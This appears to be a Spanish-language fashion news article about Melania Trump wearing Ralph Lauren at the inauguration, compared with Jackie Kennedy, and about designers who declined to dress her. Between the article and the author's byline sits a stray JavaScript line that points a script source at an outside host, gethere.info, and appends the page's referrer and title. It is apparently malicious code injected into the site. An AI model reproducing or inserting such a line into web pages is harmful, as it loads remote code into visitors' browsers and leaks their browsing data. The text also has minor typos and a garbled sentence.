Melania Trump se viste al estilo de Jackie Kennedy

La ahora primera dama de los Estados Unidos encontró quien la vistiera para la toma de protesta de su esposo Donald Trump y fue el diseñador Ralph Lauren

En la investidura presidencial la primera dama vistió al parecer se inspiró en el estilo de Jackie Kennedy, pues optó por usar un vestido azul bebé cachemira en conjunto con un abrigo torero, bolso, guantes y zapatos del diseñador estadounidense Ralph Lauren.

“La investidura presidencial es un momento para que mostremos al mundo lo mejor de Estados Unidos. Ha sido importante para nosotros mantener y celebrar la tradición de crear un estilo americano icónico para este momento”,comentó un portavoz de Lauren, según el The New York Times.

Con el toque de los Kennedy que solía hacer uso de los tonos pastel, la chaqueta a juego con el vestido y el cuello a la caja, sin faltarle nunca en las manos unos guantes, Melania decidió usar un azul pastel para la investidura de su esposo, algo que estaba en suspenso pues no se había revelado nada de su vestuario para el llegado día.

 

trump_inauguration_garc

 

Anteriormente ya se habían negado diversos diseñadores en vestir a la exmodelo esolovena, tal fue el caso de de noviembre, Sophie Theallet, la encargada de los looks de Michelle Obama, compartió en su cuenta de Twitter una carta en la que se negó a colaborar con vestir a la nueva Primera Dama.

Además se formó un grupo de diseñadores que decidieron negarle a los Trump sus diseños, con el fin de hacer presión desde la industria de la moda para evitar que Donald Trump llegara a la presidencia; Tom Ford y Marc Jacobs; empero, diseñadores como Vera Wang, Jason Wu, Joseph Altuzarra, Thakoon, Donna Karan, Calvin Klein, Diane von Furstenberg, Prabal Gurung, Michael Kors o Georgina Chapman (directora creativa de Marchesa) fueron algunos de los creadores que le dieron el no a la primera dama.

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

360

Arian Esquivel, promotor y gestor creativo. Creador. ciclista y lector.

No hay comentarios

Dejar un comentario

Su correo electrónico no será revelado